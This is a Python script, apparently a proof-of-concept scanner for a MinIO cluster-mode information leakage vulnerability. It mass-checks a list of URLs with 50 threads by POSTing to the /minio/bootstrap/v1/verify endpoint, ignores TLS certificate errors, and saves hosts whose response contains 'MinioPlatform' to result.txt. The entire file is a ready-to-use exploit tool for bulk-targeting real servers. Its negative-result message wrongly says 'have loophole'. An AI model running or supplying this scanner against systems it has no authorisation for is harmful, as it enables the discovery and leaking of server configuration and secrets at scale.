import requests,argparse,sys
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    banner = """


███╗   ███╗██╗███╗   ██╗██╗ ██████╗        ██████╗██╗     ██╗   ██╗███████╗████████╗███████╗██████╗ 
████╗ ████║██║████╗  ██║██║██╔═══██╗      ██╔════╝██║     ██║   ██║██╔════╝╚══██╔══╝██╔════╝██╔══██╗
██╔████╔██║██║██╔██╗ ██║██║██║   ██║█████╗██║     ██║     ██║   ██║███████╗   ██║   █████╗  ██████╔╝
██║╚██╔╝██║██║██║╚██╗██║██║██║   ██║╚════╝██║     ██║     ██║   ██║╚════██║   ██║   ██╔══╝  ██╔══██╗
██║ ╚═╝ ██║██║██║ ╚████║██║╚██████╔╝      ╚██████╗███████╗╚██████╔╝███████║   ██║   ███████╗██║  ██║
╚═╝     ╚═╝╚═╝╚═╝  ╚═══╝╚═╝ ╚═════╝        ╚═════╝╚══════╝ ╚═════╝ ╚══════╝   ╚═╝   ╚══════╝╚═╝  ╚═╝
                                                                                                    
                                                                       author:zm
"""
    print(banner)

def main():
    banner()
    parser = argparse.ArgumentParser(description="This is MinIO cluster mode information leakage vulnerability")
    parser.add_argument('-u','-url',dest='url',type=str,help="Please input your URL")
    parser.add_argument('-f','-file',dest='file',type=str,help="Please input your File path")
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(50)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    payload = "/minio/bootstrap/v1/verify"
    headers = {
        'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:109.0)Gecko/20100101Firefox/110.0',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Accept-Encoding':'gzip,deflate',
        'Connection':'close',
        'Upgrade-Insecure-Requests':'1',
        'Content-Type':'application/x-www-form-urlencoded',
        'Content-Length':'0',
    }
    try:
        res1 = requests.post(url=target+payload,headers=headers,verify=False,timeout=10)
        if res1.status_code == 200 and 'MinioPlatform' in res1.text:
            print(f"[+]{target} have loophole “{target+payload}”")
            with open ('result.txt','a',encoding='utf-8') as f:
                f.write(target+'\n')
        else:
            print(f"[-]{target} have loophole")
    except:
        pass

if __name__ == "__main__":
    main()
